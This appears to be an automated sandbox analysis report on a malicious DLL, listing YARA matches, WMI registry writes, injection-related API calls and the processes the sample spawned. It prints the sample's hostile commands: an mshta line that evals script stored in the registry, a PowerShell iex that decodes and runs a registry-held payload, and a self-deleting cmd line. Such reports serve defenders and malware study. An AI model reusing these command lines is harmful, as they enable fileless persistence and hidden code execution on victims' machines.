                      Source: Yara matchFile source: 00000003.00000003.545790657.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678615660.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534139791.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678663993.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.679072196.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678803157.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534181195.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545843952.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.635415693.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.533885657.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678996946.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.620987281.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545818216.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545905967.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.637594207.000000000544C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6424, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3352, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.loaddll32.exe.b00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4a794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.96a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.13494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4a794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.6aa309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.13494a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50394a0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50394a0.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3020000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2f7a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2f7a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.96a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.69a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.69a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.6aa309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e1a0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.300a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2bd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.300a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.821862720.0000000001349000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.488168081.0000000002F70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.750652443.0000000005039000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.524931430.0000000004A79000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.457623668.0000000003000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.456819132.0000000000690000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.491371934.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
                      Disables SPDY (HTTP compression, likely to perform web injects)Show sources
                      Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

                      System Summary:

                      barindex
                      Writes or reads registry keys via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: uT9rwkGATJ.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1A21B4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B04C40
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B0AF24
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B02B76
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00670C49
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00670CBE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B5348B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B51C14
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B571AA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B561D5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B68D77
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B59F02
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B5135C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00570CBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00570C49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02DA0CBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02DA0C49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03349F02
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0334135C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0334EBA2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03358D77
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_033471AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_033461D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03341C14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0334348B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02BD4C40
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02BDAF24
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02BD2B76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00840CBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00840C49
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1A13B8 GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1A15C6 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1A1273 NtMapViewOfSection,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1A23D5 NtQueryVirtualMemory,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B094E8 NtMapViewOfSection,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B09269 GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B05D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B0B149 NtQueryVirtualMemory,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B6F02A NtQueryInformationProcess,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B5D5B8 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B645D7 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B60DD9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B665CE RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B6D103 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B5CC12 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B7186D NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B5B9B9 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B6E9C2 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B662DC NtGetContextThread,RtlNtStatusToDosError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B5979A memset,NtQueryInformationProcess,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B56F3E memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B76B6A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0335420A GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0335D103 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0334D5B8 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_033545D7 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03350DD9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_033565CE RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0335F02A NtQueryInformationProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03346F3E memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03366B6A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0334979A memset,NtQueryInformationProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_033562DC NtGetContextThread,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0334B9B9 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0335E9C2 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0334CC12 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03360C0C NtQuerySystemInformation,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0336186D NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02BD5D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02BDB149 NtQueryVirtualMemory,
                      Source: hiiw3gsl.dll.31.drStatic PE information: No import functions for PE file found
                      Source: uio4qdnj.dll.29.drStatic PE information: No import functions for PE file found
                      Source: ebytp2em.dll.35.drStatic PE information: No import functions for PE file found
                      Source: hjljqxud.dll.32.drStatic PE information: No import functions for PE file found
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: mspdb140.dll
                      Source: uT9rwkGATJ.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Camptiny
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Consonantget
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,LongSubstance
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Edc0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Edc0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9EC1.tmp' 'c:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB12F.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB287.tmp' 'c:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC95B.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP'
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Camptiny
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Consonantget
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,LongSubstance
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline'
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline'
